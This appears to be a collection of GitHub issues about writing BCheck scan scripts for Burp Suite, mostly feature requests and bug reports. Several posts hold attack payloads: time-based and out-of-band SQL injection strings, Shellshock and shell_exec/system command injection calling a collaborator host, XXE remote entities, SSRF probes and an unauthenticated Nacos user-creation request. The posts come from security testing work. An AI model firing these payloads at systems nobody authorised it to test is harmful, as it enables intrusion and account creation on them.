Can we consider this repository as a centralised repository for all the bcheck templates. If we could have an option to one click install and update all the template within burp suite application.

Similar to BApp store where we can install/update all extension with one click.

It would be nice to have a similar options for bcheck as well if we can consider this repository as main source of all the templates.

Hi all, as a continuation of the discussion here (Issuing requests to each directory in a URL) #6, I'd love to know if there could be a way to run bchecks on all folders, for all hosts. Right now, as far as I know we can trigger a bcheck on every host and every query.

The use case that I am interested in is Tomcat path normalization. The current way that I see bchecks being leveraged for finding files in a folder, is to do a "given request" and do a regex replace to hit the directories under that path. However, this will trigger for every single request in specific directories, thus triggering continuously. For example, this bcheck here looks for potential php files at the root of the directory. If we manually request "/foo/bar" on a server, the bcheck will check for
"/foo//php.php", "/foo//phpinfo.php", "/foo//php.php", "/foo//info.php", etc. as expected. However, if we manually request /foo/baz", the bcheck will once again check for "/foo//php.php", "/foo//phpinfo.php", "/foo//php.php", "/foo//info.php", etc., duplicating requests uselessly.

We can "minimize" this by checking the "ignore duplicate items based on URL and parameter names" setting in the scanner task, so it doesn't keep triggering over and over for the same initial request, but it'll still trigger for all other endpoints under that particular folder.

To illustrate the issue, lets take a simple web application loading a javascript file, a css file, and an image (4 requests). If all of these are in the same directory-path, it would be nice if the bcheck had a way to check for those potential paths only once per directory. Right now, the bcheck would trigger 4 times (once for the initial request plus 3 for each asset), thus generating 105 requests total, when 21 only were necessary. This quickly gets out of hand on modern apps with hundreds of assets, generating thousands of unnecessary requests for repeat checks.

I think a solution would be to be able to have an event handler that would trigger on each directory per host. If we could do something like this, for example

run for each:
    potential_path =
        "/foo"
        "/bar"
        "/baz"

given directory then
    send request:
        path: ${base.request.directory}${potential_path}

[...]

This would allow us so much more flexibility to run checks for directory-related issues (leftover debug files, path normalization, etc). Obviously this would need to be tracked the same way requests are tracked currently with the "ignore duplicate items based on URL and parameter names" setting.

Thank you for considering this!

Is there a way to issue requests for each directory in a path? For example, let's say we want to look for /.git/config in each directory for the URL http://foo.com/dir1/dir2/test.html. That would result in three requests:

GET http://foo.com/dir1/dir2/.git/config
GET http://foo.com/dir1/.git/config
GET http://foo.com/.git/config

I mean there is no way for a console logging somewhere ?

add this
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)

I have created bchecks for detecting sqli inj, but it seems to be appending the payload only on the GET parameters.

metadata:
    language: v1-beta
    name: "SQL Inj POST"
    description: "Tests for sqli"
    author: "Muthu"

run for each:
    inj = "'","'+OR+1=1--"

given query or body insertion point then
    send payload called check:
        appending: {inj}

    if {check.response.body} matches "(SQL|Postgresql|Microsoft Sql|sql|postgresql|microsoft sql)" then
        report issue:
            severity: info
            confidence: certain
            detail: `There is a change in response when {inj} is injected.`
            remediation: "Ensure your git directories are not exposed."
    end if

It would really be helpful if we could send a request based on a response condition.

Consider this scenario:

1. I want to detect whenever a response has a Content-Type of application/json
2. When detected, I then wish to send a request to fetch a relative URL to that response (ie: GET {latest.response.url.path}/../swagger/swagger.json)

This would allow the detection of potential API docs relative to a possible API endpoint.

The point is we cannot send a request based on the "given response" action. Could that be considered in the future?

Is there a way to filter on bchecks in the issues section of the Dashboard (e.g. tags) without adding something custom to the name (e.g. "name: cve-xx-xxxx (bcheck)")? It would be nice to quickly filter on bcheck issues from other issues or having tags usable in the dashboard.

Can we work with all the given request parameters including query and body parameters and JSON?

Assuming the request has 2 queries and 2 body parameters. Is it possible to add the payload to each parameter one by one and send 4 different requests?

We have created a simple BCheck to flag response with Content-Type: text/event-stream:

metadata:
    language: v1-beta
    name: "Event-stream detection"
    description: "Checks for event-stream (passive)"
    tags: "passive"

given response then
	if "text/event-stream" in {latest.response.headers} then
	    report issue:
	        severity: info
	        confidence: certain
	        detail: "The Content-Type: Event-stream is set in the response."
	end if

We would like to also check the request for Accept: text/event-stream in the same BCheck but that does not appear to be possible.

Basically what we would like is given request or response contains text/event-stream then report issue.

Hi,

I was wondering if there is a way when a match is being done using regex to retrieve that value.

Thank you

It would be nice to have an ability to get the current insertion point value within the given insertion point then block. Some vulnerabilities may depend on the current values of the parameters -- integers, strings or booleans.

Hello there guys!

I was creating some Bchecks yesterday and I missed some comparison operators.

I noticed this case while creating GraphQL Alias/Array-based Queries Bchecks where I tried to report an issue just if the result contained more than X occurences of a string.

Tried using RegEx but not working properly.

Am I missing something? If not, it would be a very nice feature :)

Thought about something like:

metadata:
  language: v1-beta
  name: "Some name"
  description: "Some description."
  tags: "tags"
  author: "someone"

given response then
  if ("string" matches > 5 times in {latest.response.body}) then
    report issue:
      severity: low
      confidence: tentative
      detail: "Some detail."
      remediation: "Some remediation."
  end if

How to define the scanning depth, such as http://a.com/a/b/c/ . I would like to scan/a/payload first, then/a/b/payload, and then /a/b/c/payload

Issue:
Currently a BCheck will terminate, after an issue was created, regardless if there are run for each items that were not iterated yet. This behavior is counterproductive to me. I'd like to see BChecks that can create multiple issues, depending on certain conditions.

Example:
Consider the following scenario. I've created a BCheck that checks different supported / accepted content types for an API endpoint. I've created the following BCheck to replace the header 'Accept' with a value from a list of possibly supported content types. At the end, the BCheck verifies, whether the HTTP status code indicates, that the content type was accepted or not. In case it was, I want to create an issue for further, manual investigation.

Now if during the run of this BCheck this condition would equal true (e.g for application/json), Burp would no longer check, if application/xml is also accepted.

metadata:
    language: v1-beta
    name: "Content Type Enumeration"
    description: "Testing for accepted content types"
    author: "anakles"

run for each:
    content_type =
        "text/plain",
        "text/json",
        "text/xml",
        "application/json",
        "application/xml",
        "application/x-www-form-urlencoded"

given request then
    send request called check:
        replacing headers: `Accept`: `{content_type}`

    if not({check.response.status_code} is "406") then
       report issue:
           severity: info
           confidence: certain
           detail: `The endpoint does also provide (or accept) data in the {content_type} format.`
           remediation: "Manual investigation is advised. Test, if this opens the way to new vulnerabilities."
    end if

Enhancement:
I would like to see the BCheck continue after creating the first issue. In the mentioned example this would mean, that Burp creates an issue for both application/json and application/xml (if accepted).

The default UI elements when building a custom scan configuration are a bit tedious to uncheck everything except "BCheck generated issues". Why not create a new Auditing configuration just for BChecks and add it to the built-in library?

Call it "Audit checks - BCheck scripts only" or something like that.

Should requests initiated by BChecks run concurrently based on the scan's resource pool configuration? If they should, it's not what I'm observing.

Using the default resource pool with 10 concurrent requests, I can see requests appear in the Logger one by one instead of 10 at once. Additionally, it took 178 seconds (~3 minutes) to issue 188 requests, which seems a bit too long if 10 requests were issued concurrently. I would expect it to finish in under 30 seconds in that case.

Add "given hostpath then" attribute. If only supports request and host functions scanners like nuclei can easily achieve this and have complete poc templates. Bcheck does not have an advantage. It should utilize the crawling advantage to scan discovered secondary and tertiary paths, instead of only being able to scan first-level vulnerability paths like nuclei.

I have a bcheck script which has a following line:

if {base.response.body} differs from {latest.response.body} then

supposedly, it should only report if there's changes in response body. However, what's happening was there's still a report if there's a change in response headers.

Hi PortSwigger team,

I propose the add a response's keyword: timeout as boolean value to know when the request didn't get a respond from the server for vulns like DOS.

Thank you.

metadata:
language: v1-beta
name: "SQL Injection "
description: "Classic SQL Injection"
author: "Carlos Montoya"

given query insertion point then

# only run for successful base response
if {base.response.status_code} is "200" then
    send payload called weaponized:
        appending: "'", "))", "\", "\""
                   
    #different status code for single quote -sus!
    if {weaponized.response.status_code} differs from  {base.response.status_code} then 
        send payload called benign: 
            appending:"''"
        if {benign.response.status_code} is {base.response.status_code} then 
            report issue:
                severity: high
                confidence: certain
                detail: `When adding a single quote, the status code of the response changed from {base.response.status_code} to
                          {weaponized.response.status_code}. When two quote were injected the status of the {base.response.status_code}                              
                          changed to 200. this indicates that the server is passing the user-supplied input without sanitizing.`
                remediation: "Never pass user input directly to a database. Use a prepared statement when interacting with 
                            sql databases."
        end if
     end if
end if

The bcheck file with the author "Carlos Montoya" in the example has problems, the name does not have a clear meaning, and it is difficult to confirm the usage based on the name after importing into Burp's BChecks

Hi, is there a possibility to use regex_replace() to replace the first occurrence of a single character ?

I mean can we have a count=1 like in python

replaced_string = re.sub(regex, replacement, source, count=1)

While debugging .bcheck scripts it would be REALLY nice if we could write to the Event Log so we can do rudimentary logging to see what the heck is going on. Right now, I am using "report issue:" to do it, which is ugly and just not appropriate.

Alternatively, some sort of output tab similar to how it's done in custom extensions would work too. We just need some way to track how things are flowing through a .bcheck.

Thanks for considering the request. Awesome addition. Just need to sand out some of these rough edges for script creation.

Sometimes it's necessary to compare the times that a server spent for a response so this property will be very useful.

Hi all, while writing a "given insertion point then" BCheck, I noticed that my appended payloads would automatically get URL encoded in GET parameters. Any plans on making this optional? For example, this would make finding some SSI injections and ESI injections impossible.

ie:

define:
    ssi_payload="<!--#echo var=\"HTTP_USER_AGENT\" -->"

given insertion point then
    send payload:
        appending: {ssi_payload}

Expected behaviour, the vulnerable app would echo & the web server would evaluate the SSI tag.
request:
GET /?param=foo<!--#echo var=\"HTTP_USER_AGENT\" -->
response:
foo<!--#echo var="HTTP_USER_AGENT" -->

Observed behaviour, the vulnerable app receives an URL encoded payload, the server does not see the SSI tag because it is URL encoded, thus we get a false negative:
request:
GET /?param=foo%3c!--%23echo%20var%3d%22HTTP_USER_AGENT%22%20--%3e
response:
foo%3c!--%23echo%20var%3d%22HTTP_USER_AGENT%22%20--%3e

Hi, I am creating this bcheck to detect OOB SQL Injection within cookie insertion point
I saw the DNS call within burp collaborator but the issue is not created to burpsuite dashboard.

metadata:
    language: v1-beta
    name: "HOSTS OOB SQL Injection"
    description: "Hosts OOB SQL Injection"
    author: "Abdilahrf"

run for each:
    payloads = 
        `1 AND 1=UTL_INADDR.get_host_addr('http://{generate_collaborator_address()}')`,
        `1 AND SELECT LOAD_FILE(concat('\\\\',@@version, '.{generate_collaborator_address()}/'))`,
        `x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{generate_collaborator_address()}/"> %remote;]>'),'/l') FROM dual--`

# we will automatically insert into nested insertion points
given cookie insertion point then

    # only run succesful base response code
    if {base.response.status_code} is "200" then
        send payload called weaponized:
            appending: {payloads}
            
        # If we found error message to specific database
        if any interactions then
            report issue:
                severity: high
                confidence: certain
                detail: `We found OOB SQL Injection {payloads}`
        end if 
    end if
    

i have updated my burp pro to the latest version (v2023.6.2) and when try to install the plugin i get this error

java.lang.Exception: Extension class is not a recognized type
	at burp.Zbmc.Zp(Unknown Source)
	at burp.Zbmc.Zo(Unknown Source)
	at burp.Zkfl.ZZ(Unknown Source)
	at burp.Zb5f.Zv(Unknown Source)
	at burp.Zb3r.lambda$panelLoaded$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:577)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
	at java.base/java.lang.Thread.run(Thread.java:1589)

where is the problem here
the java version is 19

I believe a useful feature would be to check the value of a certain header, rather than only checking if the header exists and if the usual values are in the response.

For example, being able to check what the value of the X-Powered-By header says would allow authors to provide more relevant guidance for specific text stacks.

Another example of where this would be useful would be to move away from the current paradigm of

and "application/json" in {check.response.headers} then

where it's only checking to see if application/json is in any of the headers, not if it's in the Content-Type header.

Example of what I'd like to see:

``
detail: The server announces its underlying technology. {latest.response.headers.X-Powered-By}

to list all instances of the X-Powered-By header.

or

and "application/json" in {check.response.headers.Content-Type} then

Since multiple can be in the response, having a way to interact individual ones or all at once would be useful as well.

it would be useful to add to the language syntax an additional field to add reference links

Example:

reference:"
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22897
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt
    - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/"

Hi,
Am trying to define a value then include it in "run for each" the code is validated.I've encountered an issue related to variable inclusion in the loop, it does not send any request at all.
here is me code example:

define:
		custom_collaborator = "XXXXX.oast.live"

run for each:
		payload = "shell_exec('ping -c 1 {custom_collaborator}')",`system('ping -c 1 {custom_collaborator}')`

i know i can change the collaborator setting but i try to create the same scenario scripts where i add defined variables to "run for each" loop.

regards

Originally posted by @ayadim in #90

Is there a url_encode function? Or there is a way to url encode the value of parameter? I visit the page:https://portswigger.net/burp/documentation/scanner/bchecks/bcheck-definition-reference#actions, and I can't find the url_encode function.

Is it possible to detect a HTTP response with a regex?

Solved.

run for each doesn't work 😀

  #     method: DELETE
  #     path: /nacos/v1/auth/users?username=



metadata:
    language: v1-beta
    name: "Nacos Create User"
    description: "Nacos Create User"
    tags: "Unauthorized","Nacos"
    author: "JaveleyQAQ"

define:
		user = {random_str(5)}

run for each:
    nacos_detect = 
		`/nacos/v1/auth/users?username={user}&password={user}`

    

given request then
    send request called nacos:
        method: "POST"
        path: {nacos_detect}
				headers:
				 "User-Agent": "Nacos-Server"
			
    if {nacos.response.status_code} is "200" and
         "create user ok!" in {nacos.response.body} then
	            report issue:
		            severity: high
		            confidence: certain
		            detail: ` Nacos create user:{user}/{user}`
		            remediation: "."
    end if

First of all, I'd like to inform you that I'm new user for BChecks. I'm trying to create Bchecks script to check missing of security response headers for some reason.

According to action report issue and continue in https://portswigger.net/burp/documentation/scanner/bchecks/bcheck-definition-reference#actions
another use example:

Currently, my Burp pro version is 2023.10.2.4. I can use action report issue without getting any error.
However, when I try to change action from report issue to report issue and continue (on line 10) I found an error as shown in the following figure.

I'm not sure what I did wrong. Please help me to provide a recommendation. Thanks.

When the run for each variables are used, the requests are getting repeated even though run for each placement may not be reached.

Consider the following situation:

You want to check for xss vulnerabilities. You have 10 payloads in run for each. But before sending those payloads you need to make sure that the injection point reflects on the page to decrease the amount of useless requests.

Example:

metadata:
    language: v1-beta
    name: "Test"
    description: "Tests"
    author: "sh"

run for each:
		calculation = "314116790-1", "314116788+1"

define:
    answer="314116789"

given insertion point then
        # check whether the injection point reflects on the page
	send payload: #[1]
		replacing: {answer}

        # if reflects - send payloads
	if {answer} in {latest.response} then
		send payload:  #[2]
			replacing: {calculation}

		if {answer} in {latest.response} then
			report issue:
			severity: medium
			confidence: tentative
			detail: "v"
		end if
	end if

With this configuration for every #[2] request the #[1] one will be sent as well(even if the first condition won't be reached at all), but the #[1] request needs to be sent only once because the response won't change.

I think it can be solved by adding another special word that will annotate the start of repeating for run for each . For example:

if {answer} in {latest.response} then
    repeat calculation:
        send payload:  #[2]
	    replacing: {calculation}

I get prompts when using the case template as well. My Burp Suite version is 2023.7.

How does it apply to passive scanning

So I am getting a rather unusual error while trying to test out a bcheck based on some of the templates here.

Process-monitoring the vulnerable VM, the ping command does get ran correctly, but something in Burp is deeply dissatisfied with things and chucks out an error.

Using the vulnerable VM from here: https://pentesterlab.com/exercises/cve-2014-6271/attachments

Template code:

metadata:
    language: v1-beta
    name: "Request-level collaborator based Shellshock"
    description: "Shellshock in headers with out-of-band detection"
    author: "fsd"

define:
    shellshock = `() \{ :;}; /bin/bash -c 'ping -c 1 {generate_collaborator_address()}'`

given request then
    send request:
        replacing headers:
              "User-Agent": `{shellshock}`

    if dns interactions then
        report issue:
            severity: high
            confidence: firm
            detail: "shellshock in user-agent header."
            remediation: "lol, update bash."
    end if

Update: It now, for whatever reason, seems to work fine. I did nothing but tried again after a while.

Can there be a way to send a request that follows a redirect if any, please?

I believe the BCheck documentation for "report action" severity and confidence may be incorrect. Considering what is already documented in the IScanIssue interface, I believe it should be:

SEVERITY

• "High"
• "Medium"
• "Low"
• "Information"
• "False positive"

CONFIDENCE

• "Certain"
• "Firm"
• "Tentative"

Currently, both Severity and Confidence are listed as "[info|low|medium|high]" which doesn't map to any current issue rating in Burp.

The examples don't even match what the BCheck docs show, so I think it would be good to keep all docs aligned with the underlying IScanIssue interface that ends up in the Issue Activity pane anyways.

If I am incorrect in this expectation, could you please clarify what the RIGHT values are supposed to be so we can make sure we use the right severity and confidence levels in future check scripts?

I want to loop payload into all the JSON values

We need to match the response time for find vulns like sqli time based vulns.

Hi team,

First of all, thanks for the great work on BCheck! It's an excellent feature.
I really appreciate it, that the reason why I want to contribute by reporting some issues.

Use case: create a BCheck rule that will request admin endpoints without authentication information (headers: cookie & authorization)

• Incorrect documentation for removing headers on bcheck-definition-reference:

I went to the documentation sub-section of send request.

send request [called request_name]:
  [..]
  removing headers:
    "name_of_header1":,
    "name_of_header2":"

So at this point, I didn't understand why I had to specify the value of the headers I want deleted. But when I validated my rule it gave me an error on the position of the character :

Then, I looked at the description column in front of the row removing headers: in the table above:

Removes the specified header(s) from the request. You can list multiple header names

So, this explains why I got a validation error of the rule: compared to the documentation's example (showed above). I had to give a list of headers, not a dictionary.

Improve/fix the documentation with:

send request [called request_name]:
  [..]
  removing headers:
    "name_of_header1",
    "name_of_header2"

• Removing specific headers behavior doesn't seem to work:

Now my rule is valid, let's move on the implementation, here is the minimal reproducible example (MRE):

metadata:
    language: v1-beta
    name: "Remove AuthZ headers"
    description: "Remove Cookie and Authorization headers"
    author: "someone"
    tags: "active", "unauthenticated"

run for each:
    potential_path =
        "/admin",
        "/admin-panel"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}
        removing headers:
            "Cookie",
            "Authorization"

    if {check.response.status_code} is "200" then
        report issue:
            severity: medium
            confidence: firm
            detail: "rule detail"
            remediation: "rule remediation"
    end if

While launching the scan, the requests always contain headers that are supposed to be removed: Cookie or Authorization.
So, the rule therefore matches where it shouldn't.

It is a known issue that removing something with a rule (headers there) does not work?

This is my code, and I know for sure that there will be a callback, but I'm reporting an error in the event log

This is my complete code

`metadata:
language: v1-beta
name: "Request-level collaborator based"
description: "Blind SSRF with out-of-band detection"
author: "Carlos Montoya"

given insertion point then
send payload:
replacing: {generate_collaborator_address()}
if dns interactions then
report issue:
severity: high
confidence: firm
detail: "This site fetches arbitrary URLs specified in the Referer header."
remediation: "Ensure that the site does not directly request URLs from the Referer header."
end if`

sql time based injection

When there are many template directories with multiple levels, templates in second-level and below directories cannot be imported.

Hello, How I can replace the value of each parameter? or append a payload to each parameter?